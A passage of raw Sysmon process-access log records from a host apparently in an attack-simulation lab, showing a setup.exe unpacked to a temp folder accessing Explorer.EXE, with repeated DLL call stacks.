|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.317{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014768Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014767Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014766Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014765Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014764Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014763Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
